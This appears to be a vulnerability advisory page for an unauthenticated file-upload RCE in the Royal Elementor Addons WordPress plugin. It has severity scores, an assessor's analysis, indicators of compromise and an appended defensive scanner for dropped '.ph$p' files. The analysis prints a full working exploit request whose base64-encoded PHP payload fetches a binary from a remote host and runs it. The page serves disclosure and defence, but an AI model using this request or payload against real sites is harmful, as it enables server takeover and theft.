CVSS3: 9.8 High
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
AI Score: 9.7 High (Confidence: High)
EPSS: 0.911 High (Percentile: 98.9%)
The Royal Elementor Addons and Templates WordPress plugin before 1.3.79 does not properly validate uploaded files, which could allow unauthenticated users to upload arbitrary files, such as PHP and achieve RCE.
Recent assessments:
jheysel-r7 at November 29, 2023 9:40pm UTC reported:
The Royal Elementor Addons and Templates WordPress plugin provides themes and templates to make your WordPress site aesthetically pleasing with little effort. With over 200,000 installations it is quite popular, making it a fantastic target for opportunistic attackers.
Versions prior to 1.3.79 are vulnerable to a file upload vulnerability which results in code execution as the user running the WordPress site. Once a WordPress site is configured to use the Addon, the action wpr_addons_upload_file listens for input on the /wp-admin/admin-ajax.php endpoint and is invokable via a POST request. The action is accessible without authentication and fails to properly sanitize incoming file types. The endpoint won't allow you to upload the .php file type; however, if you upload a PHP payload with the filetype .ph$p it bypasses the sanitization mechanism and allows you to drop a payload on the target.
Exploitation of the vulnerability is demonstrated in the following POST request:
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: wordpress.docksal
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14_0) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5 Safari/605.1.15
Content-Type: multipart/form-data; boundary=---------------------------612499444778935602855148342223
Content-Length: 1078

-----------------------------612499444778935602855148342223
Content-Disposition: form-data; name="uploaded_file"; filename="WmrRA8wI.ph$p"
Content-Type: application/octet-stream

<?php system(base64_decode('Y3VybCAtc28gLi92RVNIVllzd0p2dyBodHRwOi8vMTcyLjE2LjE5OS4xMzc6ODA4MC9rQW9vd3NKYnpVRER3X2FDbFg4RDhnOyBjaG1vZCAreCAuL3ZFU0hWWXN3SnZ3OyAuL3ZFU0hWWXN3SnZ3ICY='));?>
-----------------------------612499444778935602855148342223
Content-Disposition: form-data; name="action"

wpr_addons_upload_file
-----------------------------612499444778935602855148342223
Content-Disposition: form-data; name="max_file_size"

6395
-----------------------------612499444778935602855148342223
Content-Disposition: form-data; name="allowed_file_types"

ph$p
-----------------------------612499444778935602855148342223
Content-Disposition: form-data; name="triggering_event"

click
-----------------------------612499444778935602855148342223
Content-Disposition: form-data; name="wpr_addons_nonce"

aa1b436f01
-----------------------------612499444778935602855148342223--
This has been actively exploited in the wild for a while now with the first signs of exploitation dating back to December 2019.
Malicious adversaries have been identified dropping reverse shells in the following two filenames:
b1ack.p$hp with md5sum: 1635f34d9c1da30ff5438e06d3ea6590
wp.ph$p with md5sum: bac83f216eba23a865c591dbea427f22
That being said, I would be suspicious of any .ph$p file if the Royal Elementor Addons and Template plugin was being used in my WordPress site.
*Note: Updating the plugin to the patched version 1.3.79 won't remove malicious payloads dropped by an attacker, so be sure to scan for unwanted footholds after patching.
The majority of the attacks appear to be coming from the following three IP Addresses:
65[.]21.22.78
2a01[:]4f9:3080:4eea::2
135[.]181.181.50
This is super easy to exploit.
It's an unauth RCE in an internet-facing application with 200,000+ active installations (it's a big deal).
Exploited in the wild
The only reason I'd give it a 4/5 for Attack Value is because it doesn't give privileged access.
Assessed Attacker Value: 4
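A defender-side hunt for the footholds the assessment above tells you to scan for. This is added example code, not part of the page, the plugin or the assessor's work: it walks a wp-content/uploads tree and flags any file whose PHP extension has a `$` inserted (the .ph$p / .p$hp bypass described above), any file whose body opens with a PHP tag regardless of extension, and any file whose md5 matches the two hashes reported above. The directory layout and file contents in demo() are constructed sample data.

```python
import hashlib
import tempfile
from pathlib import Path

# Filenames and md5sums reported in the assessment above.
KNOWN_BAD_MD5 = {
    "1635f34d9c1da30ff5438e06d3ea6590": "b1ack.p$hp",
    "bac83f216eba23a865c591dbea427f22": "wp.ph$p",
}

def is_bypass_extension(name: str) -> bool:
    """True for a PHP extension with '$' inserted anywhere in it (ph$p, p$hp, php$)."""
    ext = name.rsplit(".", 1)[-1] if "." in name else ""
    return "$" in ext and ext.replace("$", "").lower() == "php"

def scan_uploads(root: str) -> list:
    """Walk an uploads tree; return every file matching at least one of three signals."""
    findings = []
    for path in Path(root).rglob("*"):
        if not path.is_file():
            continue
        data = path.read_bytes()
        digest = hashlib.md5(data).hexdigest()
        reasons = []
        if is_bypass_extension(path.name):
            reasons.append("bypass-extension")
        if data.lstrip().startswith(b"<?php"):  # PHP code under any extension
            reasons.append("php-open-tag")
        if digest in KNOWN_BAD_MD5:  # exact match on a reported dropper hash
            reasons.append("known-bad-md5:" + KNOWN_BAD_MD5[digest])
        if reasons:
            findings.append({"path": path.relative_to(root).as_posix(),
                             "md5": digest, "reasons": reasons})
    return sorted(findings, key=lambda f: f["path"])

def demo() -> list:
    """Build a constructed wp-content/uploads tree (sample data only) and scan it."""
    samples = {
        "2023/11/WmrRA8wI.ph$p": b"<?php /* constructed stand-in for a dropped file */ echo 1;",
        "2023/11/b1ack.p$hp": b"not php, but the extension alone is enough to flag",
        "2023/11/notes.txt": b"<?php phpinfo();",  # PHP content behind a harmless-looking name
        "2023/11/logo.png": b"\x89PNG\r\n\x1a\n",  # benign, must not be reported
    }
    with tempfile.TemporaryDirectory() as root:
        for rel, content in samples.items():
            target = Path(root, rel)
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_bytes(content)
        return scan_uploads(root)
```

Point scan_uploads() at a real wp-content/uploads directory to run the same checks against a live site; the hash match only fires on byte-identical copies of the reported files, so treat the extension and open-tag signals as the primary ones.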